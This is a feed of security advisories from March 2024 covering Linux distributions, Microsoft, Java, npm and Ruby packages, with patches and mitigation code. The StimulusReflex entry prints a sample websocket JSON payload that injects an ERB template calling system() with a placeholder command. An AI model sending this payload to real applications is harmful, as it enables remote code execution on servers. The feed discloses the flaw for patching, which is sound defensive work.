14.03.2024 19:15:51 | alpinelinux | [ALPINE:CVE-2023-39368] intel-ucode vulnerability (medium) | [From CVE-2023-39368] Protection mechanism failure of bus lock regulator for some Intel(R) Processors may allow an unauthenticated user to potentially enable denial of service via network access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39368
14.03.2024 19:15:51 | alpinelinux | [ALPINE:CVE-2023-43490] intel-ucode vulnerability (medium) | [From CVE-2023-43490] Incorrect calculation in microcode keying mechanism for some Intel(R) Xeon(R) D Processors with Intel(R) SGX may allow a privileged user to potentially enable information disclosure via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-43490
14.03.2024 19:15:50 | alpinelinux | [ALPINE:CVE-2023-28746] intel-ucode vulnerability (medium) | [From CVE-2023-28746] Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-28746
14.03.2024 19:15:49 | alpinelinux | [ALPINE:CVE-2023-22655] intel-ucode vulnerability (medium) | [From CVE-2023-22655] Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-22655
14.03.2024 13:45:28 | ubuntu | [USN-6695-1] TeX Live vulnerabilities (critical) | Several security issues were fixed in TeX Live. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6695-1
14.03.2024 12:19:40 | ubuntu | [USN-6694-1] Expat vulnerabilities (high) | Expat could be made to crash if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6694-1
14.03.2024 10:59:53 | ubuntu | [USN-6673-2] python-cryptography vulnerability (high) | python-cryptography could be made to expose sensitive information over the network. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-2
14.03.2024 09:00:00 | msrc | [MS:CVE-2024-26163] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26163
14.03.2024 09:00:00 | msrc | [MS:CVE-2024-26246] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26246
14.03.2024 02:00:00 | debian | [DSA-5640-1] openvswitch (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5640-1
14.03.2024 02:00:00 | redhat | [RHSA-2024:1335] dnsmasq security update (important) | The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server. Security Fix(es): * dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387) * dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1335
14.03.2024 02:00:00 | redhat | [RHSA-2024:1334] dnsmasq security update (important) | The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server. Security Fix(es): * dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387) * dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1334
14.03.2024 02:00:00 | redhat | [RHSA-2024:1332] kernel-rt security update (important) | The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): * sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602) * use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896) * use-after-free in sch_qfq network scheduler (CVE-2023-4921) * IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871) * fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409) * nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1332
14.03.2024 16:04:07 | maven | [MAVEN:GHSA-V682-8VV8-VPWR] Denial of Service via incomplete cleanup vulnerability in Apache Tomcat (moderate) | Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open, leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V682-8VV8-VPWR
14.03.2024 11:41:29 | almalinux | [ALSA-2024:1311] .NET 8.0 security update (moderate) | .NET 8.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1311
14.03.2024 11:56:35 | almalinux | [ALSA-2024:1308] .NET 7.0 security update (moderate) | .NET 7.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1308
14.03.2024 12:35:33 | almalinux | [ALSA-2024:1309] .NET 7.0 security update (moderate) | .NET 7.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1309
14.03.2024 14:45:29 | almalinux | [ALSA-2024:1310] .NET 8.0 security update (moderate) | .NET 8.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1310
14.03.2024 23:40:28 | maven | [MAVEN:GHSA-C2X9-VW5H-39VC] Apache Pulsar: Pulsar Functions Worker Allows Unauthorized File Access and Unauthorized HTTP/HTTPS Proxying (high) | The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment, which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". These keys allow users to specify a set of URL patterns that are permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C2X9-VW5H-39VC
14.03.2024 23:39:32 | maven | [MAVEN:GHSA-JG2G-4RJG-CMQH] Apache Pulsar: Pulsar Functions Worker's Archive Extraction Vulnerability Allows Unauthorized File Modification (high) | In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JG2G-4RJG-CMQH
14.03.2024 09:00:00 | msrc | [MS:CVE-2024-26201] Microsoft Intune Linux Agent Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26201
14.03.2024 09:00:00 | msrc | [MS:CVE-2024-26167] Microsoft Edge for Android Spoofing Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26167
15.03.2024 21:53:58 | npm | [NPM:GHSA-MP76-7W5V-PR75] TurboBoost Commands vulnerable to arbitrary method invocation (high) |
### Impact

TurboBoost Commands has existing protections in place to guarantee that only public methods on Command classes can be invoked; however, the existing checks aren't as robust as they should be. It's possible for a sophisticated attacker to invoke more methods than should be permitted, depending on the strictness of the authorization checks that individual applications enforce. Being able to call some of these methods can have security implications.

#### Details

Commands verify that the class must be a `Command` and that the method requested is defined as a public method; however, this isn't robust enough to guard against all unwanted code execution. The library should more strictly enforce which methods are considered safe before allowing them to be executed.

### Patches

Patched in the following versions.

- 0.1.3
  - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3)
  - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)
- 0.2.2
  - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2)
  - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)

### Workarounds

You can add this guard to mitigate the issue if running an unpatched version of the library.

```ruby
class ApplicationCommand < TurboBoost::Commands::Command
  before_command do
    # Method requested by the client: the part after "#" in params[:name], or the default :perform
    method_name = params[:name].include?("#") ? params[:name].split("#").last : :perform
    # Only the application's own command classes, i.e. those below TurboBoost::Commands::Command in the ancestry
    ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1]
    # Allow only methods that one of those classes itself defines as public
    allowed = ancestors.any? { |a| a.public_instance_methods(false).any? method_name.to_sym }
    throw :abort unless allowed # ← blocks invocation
    # raise "Invalid Command" unless allowed # ← blocks invocation
  end
end
```

| https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MP76-7W5V-PR75
15.03.2024 21:43:52maven[MAVEN:GHSA-QMGX-J96G-4428] SSRF vulnerability using the Aegis DataBinding in Apache CXF (moderate)A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. Users of other data bindings (including the default databinding) are not impacted.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QMGX-J96G-4428
15.03.2024 21:35:37maven[MAVEN:GHSA-R978-9M6M-6GM6] Apache ZooKeeper vulnerable to information disclosure in persistent watchers handling (moderate)
Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent to which the attacker already has access. ZooKeeper server doesn't do an ACL check when the persistent watcher is triggered and, as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of the znode, but since a znode path can contain sensitive information like a user name or login ID, this issue is potentially critical.
Users are recommended to upgrade to version 3.9.2 or 3.8.4, which fix the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R978-9M6M-6GM6
15.03.2024 02:00:00oraclelinux[ELSA-2024-1308] .NET 7.0 security update (moderate)
[7.0.117-1.0.1]
- Update to .NET SDK 7.0.117 and Runtime 7.0.17
- Port Revert 'Disable implicit rejection for RSA PKCS#1 (#95217) patch
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1308
15.03.2024 02:00:00oraclelinux[ELSA-2024-1334] dnsmasq security update (important)
[2.85-14.1]
- Fix CVE 2023-50387 and CVE 2023-50868
- Resolves: RHEL-25674
- Resolves: RHEL-25638
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1334
15.03.2024 02:00:00oraclelinux[ELSA-2024-1335] dnsmasq security update (important)
[2.79-31.2]
- Fix CVE 2023-50387 and CVE 2023-50868
- Resolves: RHEL-25628
- Resolves: RHEL-25666
[2.79-31.1]
- Do not crash on invalid domain in --synth-domain option (RHEL-22741)
[2.79-31]
- Do not create and search --local and --address=/x/# domains (#2233542)
[2.79-30]
- Make create logfile writeable by root (#2156789)
[2.79-29]
- Fix also dynamically set resolvers over dbus (#2186481)
[2.79-28]
- Correct possible crashes when server=/example.net/# is used (#2186481)
[2.79-27]
- Limit offered EDNS0 size to 1232 (CVE-2023-28450)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1335
15.03.2024 09:00:00msrc[MS:CVE-2024-26163] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26163
15.03.2024 09:00:00msrc[MS:CVE-2024-26246] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26246
15.03.2024 18:27:58maven[MAVEN:GHSA-7W75-32CG-R6G2] Apache Tomcat Denial of Service due to improper input validation vulnerability for HTTP/2 requests (moderate)
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7W75-32CG-R6G2
17.03.2024 01:21:23rubysec[RUBYSEC:TURBO_BOOST-COMMANDS-2024-28181] TurboBoost Commands vulnerable to arbitrary method invocation (high)

### Impact

TurboBoost Commands has existing protections in place to guarantee that only public methods on Command classes can be invoked; however, the existing checks aren't as robust as they should be. It's possible for a sophisticated attacker to invoke more methods than should be permitted depending on the strictness of authorization checks that individual applications enforce. Being able to call some of these methods can have security implications.

#### Details

Commands verify that the class must be a `Command` and that the method requested is defined as a public method; however, this isn't robust enough to guard against all unwanted code execution. The library should more strictly enforce which methods are considered safe before allowing them to be executed.

### Patches

Patched in the following versions.

- 0.1.3
  - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3)
  - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)
- 0.2.2
  - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2)
  - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)

### Workarounds

You can add this guard to mitigate the issue if running an unpatched version of the library.

```ruby
class ApplicationCommand < TurboBoost::Commands::Command
  before_command do
    # Resolve the requested method name ("Class#method" or the default :perform)
    method_name = params[:name].include?("#") ? params[:name].split("#").last : :perform
    # Only the application's own command classes, not the library base class or its ancestors
    ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1]
    # Allow only methods explicitly defined as public on one of those classes
    allowed = ancestors.any? { |a| a.public_instance_methods(false).any? method_name.to_sym }
    throw :abort unless allowed # ← blocks invocation
    # raise "Invalid Command" unless allowed # ← blocks invocation
  end
end
```

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:TURBO_BOOST-COMMANDS-2024-28181
18.03.2024 18:48:35ubuntu[USN-6698-1] Vim vulnerability (high)Vim could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6698-1
18.03.2024 22:10:29maven[MAVEN:GHSA-F3JH-QVM4-MG39] Erroneous authentication pass in Spring Security (high)
In Spring Security, versions 5.7.x prior to 5.7.12, 5.8.x prior to 5.8.11, versions 6.0.x prior to 6.0.9, versions 6.1.x prior to 6.1.8, versions 6.2.x prior to 6.2.3, an application is possibly vulnerable to broken access control when it directly uses the AuthenticatedVoter#vote passing a null Authentication parameter.
Specifically, an application is vulnerable if:
The application uses AuthenticatedVoter directly and a null authentication parameter is passed to it, resulting in an erroneous true return value.
An application is not vulnerable if any of the following is true:
* The application does not use AuthenticatedVoter#vote directly.
* The application does not pass null to AuthenticatedVoter#vote.
Note that AuthenticatedVoter is deprecated since 5.8; use implementations of AuthorizationManager as a replacement.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F3JH-QVM4-MG39
18.03.2024 15:00:33ubuntu[USN-6697-1] Bash vulnerability (high)Bash could be made to crash or run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6697-1
18.03.2024 06:06:20ubuntu[USN-6696-1] OpenJDK 8 vulnerabilities (high)Several security issues were fixed in OpenJDK 8.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6696-1
18.03.2024 18:20:32maven[MAVEN:GHSA-HGJH-9RJ2-G67J] Spring Framework URL Parsing with Host Validation Vulnerability (high)
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HGJH-9RJ2-G67J
18.03.2024 10:24:00almalinux[ALSA-2024:1335] dnsmasq security update (important)dnsmasq security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1335
18.03.2024 10:20:39almalinux[ALSA-2024:1334] dnsmasq security update (important)dnsmasq security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1334
17.03.2024 02:00:00freebsd[FREEBSD:0A48E552-E470-11EE-99B3-589CFC0F81B0] amavisd-new -- multipart boundary confusion
The Amavis project reports: Emails which consist of multiple parts (`Content-Type: multipart/*`) incorporate boundary information stating at which point one part ends and the next part begins. A boundary is announced by a Content-Type header's `boundary` parameter. To our current knowledge, RFC2046 and RFC2045 do not explicitly specify how a parser should handle multiple boundary parameters that contain conflicting values. As a result, there is no canonical choice which of the values should or should not be used for mime part decomposition.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:0A48E552-E470-11EE-99B3-589CFC0F81B0
18.03.2024 05:40:47rubysec[RUBYSEC:STIMULUS_REFLEX-2024-28121] StimulusReflex arbitrary method call (high)

### Summary

More methods than expected can be called on reflex instances. Being able to call some of them has security implications.

### Details

To invoke a reflex a websocket message of the following shape is sent:

```json
{
  "target": "[class_name]#[method_name]",
  "args": []
}
```

The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments [ref]:

[ref]: https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83

```ruby
method = reflex.method method_name
required_params = method.parameters.select { |(kind, _)| kind == :req }
optional_params = method.parameters.select { |(kind, _)| kind == :opt }
if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size
  reflex.public_send(method_name, *arguments)
end
```

This is problematic as `reflex.method(method_name)` can resolve to more methods than those explicitly defined by the developer in their reflex class. A good example is the `instance_variable_set` method.

```json
{
  "target": "StimulusReflex::Reflex#render_collection",
  "args": [
    { "inline": "<% system('[command here]') %>" }
  ]
}
```

### Patches

Patches are available on [RubyGems] and on [NPM].

[RubyGems]: https://rubygems.org/gems/stimulus_reflex
[NPM]: https://npmjs.org/package/stimulus_reflex

The patched versions are:

- [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)
- [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)

### Workaround

You can add this guard to mitigate the issue if running an unpatched version of the library.

1. Make sure all your reflexes inherit from the `ApplicationReflex` class
2. Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:

```ruby
class ApplicationReflex < StimulusReflex::Reflex
  before_reflex do
    # Only the application's own reflex classes, not the library base class or its ancestors
    ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1]
    # Allow only methods explicitly defined as public on one of those classes
    allowed = ancestors.any? { |a| a.public_instance_methods(false).any?(method_name.to_sym) }
    raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed
  end
end
```

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STIMULUS_REFLEX-2024-28121
20.03.2024 02:28:21slackware[SSA:2024-079-03] mozilla-thunderbird (high)
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.9.0/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-14/
    https://www.cve.org/CVERecord?id=CVE-2024-0743
    https://www.cve.org/CVERecord?id=CVE-2024-2605
    https://www.cve.org/CVERecord?id=CVE-2024-2607
    https://www.cve.org/CVERecord?id=CVE-2024-2608
    https://www.cve.org/CVERecord?id=CVE-2024-2616
    https://www.cve.org/CVERecord?id=CVE-2023-5388
    https://www.cve.org/CVERecord?id=CVE-2024-2610
    https://www.cve.org/CVERecord?id=CVE-2024-2611
    https://www.cve.org/CVERecord?id=CVE-2024-2612
    https://www.cve.org/CVERecord?id=CVE-2024-2614
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.9.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.9.0-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.9.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
4618baa1a57c4aa4835d5019eb72c294  mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
218c827f2371df972f486758a0cfccdd  mozilla-thunderbird-115.9.0-x86_64-1_slack15.0.txz

Slackware -current package:
6e57078f76e49bc84eb18dfdcf1dfb66  xap/mozilla-thunderbird-115.9.0-i686-1.txz

Slackware x86_64 -current package:
8d77d2b826be2370cfe23f15a237361e  xap/mozilla-thunderbird-115.9.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-03
20.03.2024 02:27:50slackware[SSA:2024-079-02] mozilla-firefox (high)
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz:  Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.9.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-13/
    https://www.cve.org/CVERecord?id=CVE-2024-0743
    https://www.cve.org/CVERecord?id=CVE-2024-2605
    https://www.cve.org/CVERecord?id=CVE-2024-2607
    https://www.cve.org/CVERecord?id=CVE-2024-2608
    https://www.cve.org/CVERecord?id=CVE-2024-2616
    https://www.cve.org/CVERecord?id=CVE-2023-5388
    https://www.cve.org/CVERecord?id=CVE-2024-2610
    https://www.cve.org/CVERecord?id=CVE-2024-2611
    https://www.cve.org/CVERecord?id=CVE-2024-2612
    https://www.cve.org/CVERecord?id=CVE-2024-2614
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.9.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.9.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.9.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
70d69e0628d6abe611ea0eea4c2bafca  mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
d3fecb96e60e43763f35cfc16d2a579e  mozilla-firefox-115.9.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
26b970951bb68bf2239275dac7ab6d5d  xap/mozilla-firefox-115.9.0esr-i686-1.txz

Slackware x86_64 -current package:
52446847102fe96dcf898923285e9c9a  xap/mozilla-firefox-115.9.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-02
20.03.2024 02:27:18slackware[SSA:2024-079-01] gnutls
New gnutls packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/gnutls-3.8.4-i586-1_slack15.0.txz:  Upgraded.
  This update fixes two medium severity security issues:
  libgnutls: Fix side-channel in the deterministic ECDSA.
    Reported by George Pantelakis (#1516).
  libgnutls: Fixed a bug where certtool crashed when verifying a certificate
    chain with more than 16 certificates.
    Reported by William Woodruff (#1525) and yixiangzhike (#1527).
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-28834
    https://www.cve.org/CVERecord?id=CVE-2024-28835
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gnutls-3.8.4-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gnutls-3.8.4-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/gnutls-3.8.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/gnutls-3.8.4-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
2ed3c47691977050c7f0f0b696a922a9  gnutls-3.8.4-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
2f7109962a61f3a83112e1477ef4df94  gnutls-3.8.4-x86_64-1_slack15.0.txz

Slackware -current package:
105f92ad0cf3382774f7c987b983f31a  n/gnutls-3.8.4-i586-1.txz

Slackware x86_64 -current package:
6c66cf1248836f79d270bdbfc292f26d  n/gnutls-3.8.4-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg gnutls-3.8.4-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-01
19.03.2024 23:00:37ubuntu[USN-6702-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6702-1
20.03.2024 00:15:09npm[NPM:GHSA-6HH7-46R2-VF29] Server crashes on invalid Cloud Function or Cloud Job name (critical)

### Impact

Calling an invalid Parse Server Cloud Function name or Cloud Job name crashes the server and may allow for code injection.

### Patches

Added string sanitation for Cloud Function name and Cloud Job name.

### Workarounds

Sanitize the Cloud Function name and Cloud Job name before they reach Parse Server.

### References

- https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29
